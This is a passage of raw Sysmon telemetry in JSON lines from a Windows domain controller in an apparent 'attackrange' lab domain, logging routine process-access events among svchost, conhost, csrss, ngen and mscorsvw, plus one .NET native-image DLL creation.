{"EventTime":"2020-08-01 07:00:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7533,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:59.887\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:59.887","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7534,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:59.887\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:59.887","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7535,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:59.887\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:59.887","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7536,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:59.887\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:59.887","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7537,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:59.887\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:59.887","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7538,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:59.887\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-0010F6780500}\r\nSourceProcessId: 3336\r\nSourceThreadId: 1980\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-132B-5F25-0000-00109E810B00}\r\nTargetProcessId: 752\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:59.887","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010F6780500}","SourceProcessId":"3336","SourceThreadId":"1980","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-132B-5F25-0000-00109E810B00}","TargetProcessId":"752","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7539,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:00:59.902\r\nProcessGuid: {E2A3D6B1-1327-5F25-0000-0010CD750B00}\r\nProcessId: 744\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\2e8-0\\Microsoft.Build.dll\r\nCreationUtcTime: 2020-08-01 07:00:59.902","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:00:59.902","ProcessGuid":"{E2A3D6B1-1327-5F25-0000-0010CD750B00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\2e8-0\\Microsoft.Build.dll","CreationUtcTime":"2020-08-01 07:00:59.902","EventReceivedTime":"2020-08-01 07:01:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7540,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:00.012\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-132C-5F25-0000-00108D830B00}\r\nTargetProcessId: 484\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:00.012","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-132C-5F25-0000-00108D830B00}","TargetProcessId":"484","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7541,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:00.012\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-132C-5F25-0000-00108D830B00}\r\nTargetProcessId: 484\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 